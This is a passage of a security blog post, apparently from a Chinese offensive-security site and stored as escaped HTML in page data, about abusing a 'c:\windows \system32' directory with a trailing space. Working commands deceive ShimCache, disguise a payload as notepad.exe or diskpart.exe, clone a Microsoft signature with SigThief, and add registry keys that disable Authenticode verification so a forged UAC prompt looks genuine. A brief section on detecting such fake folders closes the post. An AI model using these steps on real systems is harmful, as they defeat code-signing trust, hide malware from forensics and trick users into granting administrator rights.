shutdown\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Skip writing to the registry, unable to record the system boot-to-shutdown log this time\u003C\u002Fp>\u003Cp>\u003Cstrong>(3) Modify memory\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>(Theoretically feasible)\u003C\u002Fp>\u003Cp>Here I attempt to deceive ShimCache by simulating a trusted directory, which is highly deceptive\u003C\u002Fp>\u003Cp>Method as follows:\u003C\u002Fp>\u003Ch4>1. Create trusted directory \"c:\\windows \\system32\"\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003Cbr>md \"\\\\?\\c:\\windows \\system32\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Release file \"c:\\windows \\system32\\calc.exe\"\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy c:\\test\\putty.exe \"\\\\?\\c:\\windows \\system32\\notepad.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Execute\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"c:\\windows \\system32\\notepad.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Check ShimCache after reboot\u003C\u002Fh4>\u003Cp>Tool used: https:\u002F\u002Fgithub.com\u002Fmandiant\u002FShimCacheParser\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg export \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCompatCache\" ShimCache.reg\u003Cbr>ShimCacheParser.py -o out.csv -r c:\\test\\ShimCache.reg -t\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View results, which can be quite deceptive, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017471150_4_f3ca9956da-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Forge Normal UAC Prompt by Simulating Trusted Directory\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Write a program that requires administrator privileges to run\u003C\u002Fh3>\u003Cp>Using Visual Studio\u003C\u002Fp>\u003Cp>VS project settings location:\u003C\u002Fp>\u003Cp>Configuration Properties -&gt; Linker -&gt; Manifest File, select 'require administrator to run'\u003C\u002Fp>\u003Cp>Alternatively, modify the manifest in the PE file resources\u003C\u002Fp>\u003Ch3>2. Simulate trusted directory and release files\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy c:\\test\\testuac.exe \"\\\\?\\c:\\windows \\system32\\diskpart.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute: \"c:\\windows \\system32\\diskpart.exe\"\u003C\u002Fp>\u003Cp>A UAC prompt pops up, showing the path as the normal diskpart.exe, but the lack of signature will trigger an anomaly warning, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017483505_5_45282ad14b-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Executing the normal diskpart.exe, the UAC prompt is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017493531_6_3528ec8980-1.jpeg\">\u003C\u002Fp>\u003Cp>To spoof a genuine UAC prompt, Authenticode signature forgery for PE files can be utilized\u003C\u002Fp>\u003Cp>Reference: 'Authenticode Signature Forgery – Signature Forgery and Signature Verification Hijacking for PE Files'\u003C\u002Fp>\u003Ch3>3. Signature Forgery\u003C\u002Fh3>\u003Cp>Using SigThief, the address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsecretsquirrel\u002FSigThief\u003C\u002Fp>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sigthief.py -i C:\\Windows\\System32\\consent.exe -t c:\\test\\testuac.exe -o c:\\test\\new.exe\u003Cbr>copy c:\\test\\new.exe \"\\\\?\\c:\\windows \\system32\\diskpart.exe\" \u002Fy\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Bypass Certificate Verification\u003C\u002Fh3>\u003Cp>The command to add the registry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\Windows\\System32\\ntdll.dll\" \u002Ff\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"DbgUiContinue\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>5. Final Testing\u003C\u002Fp>\u003Cp>Execute again: \"c:\\windows \\system32\\diskpart.exe\", the UAC prompt is the same as the genuine diskpart.exe, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017501752_7_4936655532-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For the exploitation of simulating trusted directories, the prerequisite is the creation of a forged directory, so monitoring the short filenames of folders can be considered\u003C\u002Fp>\u003Cp>If short filenames similar to system directories appear, they can be flagged\u003C\u002Fp>\u003Cp>Method to view short filenames: dir \u002Fx\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017507825_8_9b37bfca59-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces three additional exploitation techniques for simulating trusted directories and concludes with defense recommendations\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1200,"Onedaysec",5,"published","2026-02-02T07:51:00.264Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Bypass UAC & Autoruns with Simulated Trusted Directories","UAC bypass, simulated trusted directories, Autoruns evasion, Windows security, privilege escalation, ShimCache deception, malware persistence",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],423,421,420,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.461Z","2026-07-23T16:01:33.472Z","draft","2026-07-23T16:06:06.912Z"]